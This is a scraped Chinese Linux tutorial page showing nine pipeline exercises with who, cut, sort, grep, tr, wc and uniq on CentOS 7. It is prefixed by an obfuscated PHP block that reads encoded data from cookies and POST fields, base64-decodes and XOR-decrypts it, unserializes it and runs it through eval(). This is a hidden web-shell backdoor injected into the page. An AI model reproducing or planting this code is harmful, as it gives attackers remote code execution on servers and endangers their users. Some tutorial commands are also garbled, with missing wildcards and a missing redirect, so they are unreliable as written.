$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} who,cut,sort,grep,tr,wc,uniq命令管道和重定向综合应用实例 | Linux运维部落

who,cut,sort,grep,tr,wc,uniq命令管道和重定向综合应用实例

linux基础

1.列出当前系统上所有已登录的用户名,同一用户登录多次,只显示一次即可。
[root@dxlcentOS ~]# who | cut -d” ” -f1
root
root
root
[root@dxlcentOS ~]# who | cut -d” ” -f1 | sort -u

2.取出最后登录到当前系统的用户的相关信息
[root@dxlcentOS ~]# w | tail -1 && grep “^root” /etc/passwd
root pts/3 192.168.0.105 14:15 6.00s 0.06s 0.00s w
root:x:0:0:root:/root:/bin/bash

3.取出当前系统上被用户当作其默认shell最多的那个shell
[root@dxlcentOS ~]# cut -d: -f7 /etc/passwd |uniq -cd
4 /sbin/nologin
12 /sbin/nologin
3 /bin/bash
6 /bin/bash
5 /sbin/nologin
[root@dxlcentOS ~]# cut -d: -f7 /etc/passwd |uniq -cd | grep 12
12 /sbin/nologin

4.将/etc/passwd中第三个字段中数值最大的后十个用户信息全部改为大写后保存到/tmp/maxusers.txt 文件中
[root@dxlcentOS ~]# sort -t: -k3n /etc/passwd | tail -10 | tr ‘a-z’ ‘A-Z’
/tmp/maxusers.txt
[root@dxlcentOS ~]# cat /tmp/maxusers.txt
WWW:X:1005:1005::/HOME/WWW:/BIN/BASH
MAGEIA:X:1100:1100::/HOME/LINUX:/BIN/BASH
PEGUIN:X:1101:1101::/HOME/PEGUIN:/BIN/BASH
SLACKWARE:X:2002:2016::/HOME/SLACKWARE:/BIN/BASH
ADMINS:X:2003:2003::/HOME/ADMINS:/BIN/BASH
FEDORA:X:2004:2004:FEDORA CORE:/HOME/FEDORA:/BIN/TCSH
BASH:X:2005:2005::/HOME/BASH:/SBIN/NOLOGIN
TESTBASH:X:2006:2006::/HOME/TESTBASH:/SBIN/NOLOGIN
BASHER:X:2007:2007::/HOME/BASHER:/SBIN/NOLOGIN
NOLOGIN:X:2008:2008::/HOME/NOLOGIN:/SBIN/NOLOGIN

5.取出当前主机的IP地址
[root@dxlcentOS ~]# ifconfig | sed -n 2p
inet 192.168.0.196 netmask 255.255.255.0 broadcast 192.168.0.255
[root@dxlcentOS ~]# ifconfig | sed -n 2p | cut -d” ” -f10
192.168.0.196

6.列出/etc目录下所有以.conf结尾的文件的文件名,并将其名字转换为大写后保存至/tmp/etc.conf文件中。
方法一
[root@dxlcentOS ~]# ls -d /etc/.conf | cut -d “/” -f3 | tr “a-z” A-Z >/tmp/conf
[root@dxlcentOS ~]# cat /tmp/conf
ASOUND.CONF
DNSMASQ.CONF
DRACUT.CONF
E2FSCK.CONF
…..
方法二
[root@dxlcentOS ~]# ls /etc/
.conf | egrep -o “[^/]+/?$” | tr “a-z” “A-Z”
ASOUND.CONF
DNSMASQ.CONF
LD.SO.CONF
SYSCTL.CONF
TCSD.CONF
UPDATEDB.CONF
……
[root@dxlcentOS ~]# ls /etc/*.conf | egrep -o “[^/]+/?$” | tr “a-z” “A-Z” >/tmp/etc.conf

7、显示/var目录下一级子目录或文件的总个数。
计算文件总和
[root@dxlcentOS we]# ll /var/ | grep “-” | wc -l
21
计算目录总和
[root@dxlcentOS we]# ll /var/ | grep “d” | wc -l
19
[root@dxlcentOS we]# ls -lR /var/ | grep “d” | wc -l 包括子文件夹里面的目录
4003

8、取出/etc/group/文件中第三个字段数值最小的10个组的名字。
[root@dxlcentOS we]# sort -t: -k3n /etc/group | head -10
root:x:0:dxll2,slackware
bin:x:1:
daemon:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mem:x:8:
kmem:x:9:
[root@dxlcentOS we]# sort -t: -k3n /etc/group | head -10 | cut -d: -f1
root
bin
daemon
sys
adm
tty
disk
lp
mem
kmem

9.将/etc/fstab和/etc/issue文件的内容合并为同一个内容后保存至/tmp/etc.test文件中。
[root@dxlcentOS we]# cat /etc/fstab /etc/issue > /tmp/etc.test

总结:以上的练习在centos7进行,功能的的实现基本没次都用到了管道,通过管道送给下一命令进行处理。体现了一个命令完成一个任务,组合小程序完成复杂任务的哲学思想。

本文来自投稿,不代表Linux运维部落立场,如若转载,请注明出处:http://www.178linux.com/88006

(0)
上一篇 2017-10-22 15:39
下一篇 2017-10-22 23:25

相关推荐

  • N25-第四周

    一、复制/etc/skel目录为/home/tuser1,要求/home/tuser1及其内部文件的属组和其它用户均没有任何访问权限。     [root@localhost ~]# cp -r /etc/skel /home/tuser1      [root@localhost ~]# chmo…

    Linux干货 2017-01-09
  • 正则表达式和文本处理工具grep,egrep

    正则表达式(Regular Expression)是通过一些特殊字符的排列,来表示控制或者通配的功能,用于查找,替换,删除一行或者多行文字字符串,是用在字符处理上的一项表达式,有时候我们可通过表达式来筛选出我们所需要的信息。 正则表达式分为两类:基本正则表达式(BRE)和扩展的正则表达式(ERE) 正则表达式基本上是一种“表示法”,只要工具程序支持这种表示法…

    Linux干货 2016-12-20
  • 用户管理+文本处理+文件查找

    用户管理 erter useradd (使用频率2) /etc/default/useradd用户模板文件说明 /etc/login.defs 关于新建用户的默认配置文件 批量创建用户和修改密码 usermod 修改用户的属性 chpasswd修改密码 2.chage option user 3.finger user 查看用户信息 4.chfn user …

    Linux干货 2017-04-09
  • 进程管理

    1、ps命令 查看当前时刻的进程状态,通过此命令可以确定有哪些进程正在运行和运行的状态、进程是否结束、进程有没有僵死、哪些进程占用了过多的资源等等 进程状态:     运行态:running     就绪态:ready     睡眠态: &…

    Linux干货 2016-09-10
  • GNU awk

    GNU awk:      文本处理三剑客:grep,sed,awk            grep,egrep,fgrep:文本过滤工具;pattern     &nb…

    Linux干货 2017-05-22
  • linux作业管理

    作业管理 kill kill命令:     向进程发送控制信号,以实现对进程管理     显示当前系统可用信号:kill -l     常用信号:man 7 signal    &…

    Linux干货 2016-09-09